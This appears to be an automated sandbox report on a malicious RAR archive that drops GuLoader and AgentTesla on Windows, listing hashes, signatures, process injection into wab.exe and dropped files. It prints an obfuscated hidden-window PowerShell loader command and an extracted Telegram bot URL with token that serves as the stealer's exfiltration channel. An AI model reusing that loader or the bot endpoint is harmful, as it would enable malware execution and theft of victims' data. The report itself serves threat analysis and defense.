Overview
overview
10Static
static
3attachments.zip
windows7-x64
1attachments.zip
windows10-2004-x64
1226350194-...64.rar
windows7-x64
10226350194-...64.rar
windows10-2004-x64
7226350194-...64.exe
windows7-x64
10226350194-...64.exe
windows10-2004-x64
10Civilhorto...ng.sko
windows7-x64
3Civilhorto...ng.sko
windows10-2004-x64
3Ejerkredse...31.don
windows7-x64
3Ejerkredse...31.don
windows10-2004-x64
3Ejerkredse...ng.ps1
windows7-x64
8Ejerkredse...ng.ps1
windows10-2004-x64
8Sudsers34/...se.ant
windows7-x64
3Sudsers34/...se.ant
windows10-2004-x64
3Sudsers34/...ns.oxo
windows7-x64
3Sudsers34/...ns.oxo
windows10-2004-x64
3Telekablet...st.txt
windows7-x64
1Telekablet...st.txt
windows10-2004-x64
1Analysis
-
max time kernel
157s -
max time network
159s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07/03/2024, 13:15
Static task
static1
Behavioral task
behavioral1
Sample
attachments.zip
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
attachments.zip
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
226350194-050944-sanlccjavap0003-11764.rar
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
226350194-050944-sanlccjavap0003-11764.rar
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
226350194-050944-sanlccjavap0003-11764.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
226350194-050944-sanlccjavap0003-11764.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
Ejerkredsen/Lulledes/Filateliens31.don
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
Ejerkredsen/Lulledes/Filateliens31.don
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
Ejerkredsen/Lulledes/Preconizing.ps1
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
Ejerkredsen/Lulledes/Preconizing.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
Telekablets/krakileres/miditest/Herpetotomist.txt
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
Telekablets/krakileres/miditest/Herpetotomist.txt
Resource
win10v2004-20240226-en
General
-
Target
226350194-050944-sanlccjavap0003-11764.rar
-
Size
488KB
-
MD5
3d0f594ee92bed02cbb787b2c50f6896
-
SHA1
8e61a5560a22ca39369d781af051249f703562cb
-
SHA256
dd417f9b28a642ad5b273b300099d785e84d8bc89514cb4c7703558de5f0d615
-
SHA512
32c26ab4bf9640b4529cfec87de19b83ff1d309280844b12303ae01d79483194dbac77ab8e68fbd9adfcf489dd64e5682b5a87fc39ae625d1f93aa60e911ef67
-
SSDEEP
12288:wmDS02BY1vuQ7pf9SWj1LdvFZwmjNWxsiu5eNMJ2GRWqevQp:wm8BYcQ7pf9Z1LDsgFJ2GR8Qp
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Executes dropped EXE 1 IoCs
pid Process 2372 226350194-050944-sanlccjavap0003-11764.exe -
Loads dropped DLL 2 IoCs
pid Process 1996 powershell.exe 1996 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1760 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1996 powershell.exe 1760 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1996 set thread context of 1760 1996 powershell.exe 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource yara_rule behavioral3/files/0x002600000001447e-34.dat nsis_installer_1 behavioral3/files/0x002600000001447e-34.dat nsis_installer_2 -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 2692 7zFM.exe 1996 powershell.exe 2692 7zFM.exe 1760 wab.exe 1760 wab.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2692 7zFM.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeRestorePrivilege 2692 7zFM.exe Token: 35 2692 7zFM.exe Token: SeSecurityPrivilege 2692 7zFM.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 1760 wab.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2692 7zFM.exe 2692 7zFM.exe 2692 7zFM.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3048 wrote to memory of 2692 3048 cmd.exe 28 PID 3048 wrote to memory of 2692 3048 cmd.exe 28 PID 3048 wrote to memory of 2692 3048 cmd.exe 28 PID 2692 wrote to memory of 2372 2692 7zFM.exe 31 PID 2692 wrote to memory of 2372 2692 7zFM.exe 31 PID 2692 wrote to memory of 2372 2692 7zFM.exe 31 PID 2692 wrote to memory of 2372 2692 7zFM.exe 31 PID 2372 wrote to memory of 1996 2372 226350194-050944-sanlccjavap0003-11764.exe 32 PID 2372 wrote to memory of 1996 2372 226350194-050944-sanlccjavap0003-11764.exe 32 PID 2372 wrote to memory of 1996 2372 226350194-050944-sanlccjavap0003-11764.exe 32 PID 2372 wrote to memory of 1996 2372 226350194-050944-sanlccjavap0003-11764.exe 32 PID 1996 wrote to memory of 1468 1996 powershell.exe 34 PID 1996 wrote to memory of 1468 1996 powershell.exe 34 PID 1996 wrote to memory of 1468 1996 powershell.exe 34 PID 1996 wrote to memory of 1468 1996 powershell.exe 34 PID 1996 wrote to memory of 1760 1996 powershell.exe 36 PID 1996 wrote to memory of 1760 1996 powershell.exe 36 PID 1996 wrote to memory of 1760 1996 powershell.exe 36 PID 1996 wrote to memory of 1760 1996 powershell.exe 36 PID 1996 wrote to memory of 1760 1996 powershell.exe 36 PID 1996 wrote to memory of 1760 1996 powershell.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar1⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe"C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"4⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"5⤵PID:1468
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
626KB
MD50d4bb5c57ce0f99b36056892cfe87f0c
SHA1bd884e9d666bce68ef23dfa139f6477f1c50f7ab
SHA2560301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c
SHA5127d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
Filesize
348KB
MD5edac2c2f62e371a80143df8caaec5b24
SHA10b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b
SHA256ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616
SHA512aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be
-
Filesize
57KB
MD5f5a06265c76853290d3b7ed1c1d3e7b9
SHA14083441407a629edd297d1a480a4957740b99fd1
SHA256f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab
SHA51252ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8